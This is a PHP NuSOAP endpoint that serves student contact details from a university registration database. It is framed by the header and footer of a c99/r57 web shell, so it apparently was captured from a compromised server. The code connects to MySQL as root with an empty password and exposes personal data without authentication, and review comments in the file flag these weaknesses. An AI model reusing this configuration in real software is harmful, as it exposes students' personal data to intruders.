Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/webservice/ drwxr-xr-x |
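<?php
/**
 * NuSOAP endpoint that exposes one RPC operation, studentbio, returning
 * student contact details from the `reg` database as an XML string.
 *
 * NOTE(review): nothing in this file authenticates the caller, and the
 * response carries personal data (name, home phone, parent e-mail).
 * Confirm that access is restricted elsewhere (web-server ACL, network
 * filtering) before this endpoint is reachable from untrusted networks.
 */
require_once('nusoap.php');

/**
 * Escape a value so it can be embedded as XML character data.
 *
 * Uses a byte-wise replacement of the five XML special characters, so it
 * does not depend on the encoding of the database value.
 *
 * @param mixed $value Raw column value (NULL becomes an empty string).
 * @return string Escaped text.
 */
function studentbio_xml_text($value)
{
    return strtr((string) $value, array(
        '&'  => '&amp;',
        '<'  => '&lt;',
        '>'  => '&gt;',
        '"'  => '&quot;',
        "'"  => '&apos;',
    ));
}

/**
 * Build the XML document returned by the studentbio SOAP operation.
 *
 * @param string $studentId Student identifier supplied by the SOAP caller.
 *                          NOTE(review): currently unused, because the query
 *                          below is pinned to one hard-coded ID. Earlier
 *                          drafts of the query (commented out in the
 *                          original) interpolated this argument directly
 *                          into a LIKE clause; if it is wired back in, it
 *                          must be escaped or bound, never concatenated raw.
 * @return string XML document with one <student> element per matching row;
 *                an empty <studentbio> element when the query fails or
 *                matches nothing.
 */
function studentbio($studentId)
{
    // NOTE(review): this connects as the MySQL root account with an empty
    // password, and the credentials live in a file under the web root.
    // A read-only account limited to the tables queried here, configured
    // outside the document root, would contain the damage of a compromise.
    $host = "localhost";
    $username = "root";
    $pass_word = "";
    $db = "reg";

    mysql_connect($host, $username, $pass_word) or die ("ติดต่อกับฐานข้อมูล Mysql ไม่ได้ ");
    mysql_select_db($db) or die("เลือกฐานข้อมูลไม่ได้");

    $sql = "SELECT * FROM StudentMaster WHERE (studentId='492101001')";
    $dbquery = mysql_query($sql);

    // XML element name => source column in StudentMaster.
    $fields = array(
        'code'    => 'StudentCode',
        'Name'    => 'StudentName',
        'Surname' => 'StudentSurname',
        'phone'   => 'HomePhoneNo',
        'Email'   => 'ParentEmail',
    );

    $information = '<?xml version="1.0" encoding="UTF-8"?>';
    $information .= '<studentbio>';

    if ($dbquery === false) {
        // Keep the database error in the server log; do not send it to the client.
        error_log('studentbio: query failed: ' . mysql_error());
    } else {
        while ($result = mysql_fetch_assoc($dbquery)) {
            $information .= '<student>';
            foreach ($fields as $tag => $column) {
                $value = isset($result[$column]) ? $result[$column] : '';
                // Column data is escaped so that '<' or '&' in a record cannot
                // break or alter the structure of the returned document.
                $information .= '<' . $tag . '>' . studentbio_xml_text($value) . '</' . $tag . '>';
            }
            $information .= '</student>';
        }
        mysql_free_result($dbquery);
    }

    // The root element is closed once, after every row has been appended.
    // The original closed it (and returned) inside the row loop.
    $information .= '</studentbio>';

    return $information;
}

$server = new soap_server;
$server->configureWSDL('student_bio_wsdl', 'urn:student_bio_wsdl');
$server->register(
    'studentbio',                            // PHP function exposed as the operation
    array('studentid' => 'xsd:string'),      // input message parts
    array('information' => 'xsd:string'),    // output message parts
    'http://61.19.29.30/webservice/',        // namespace
    'http://61.19.29.30/webservice/',        // SOAPAction
    'rpc',
    'encoded',
    'Search_For_Student_Bio'                 // documentation string in the WSDL
);

// NuSOAP reads the request body from $HTTP_RAW_POST_DATA; default it to an
// empty string so a plain GET (e.g. a ?wsdl request) does not raise a notice.
$HTTP_RAW_POST_DATA = isset($HTTP_RAW_POST_DATA) ? $HTTP_RAW_POST_DATA : '';
$server->service($HTTP_RAW_POST_DATA);
?>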
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0059 ]-- |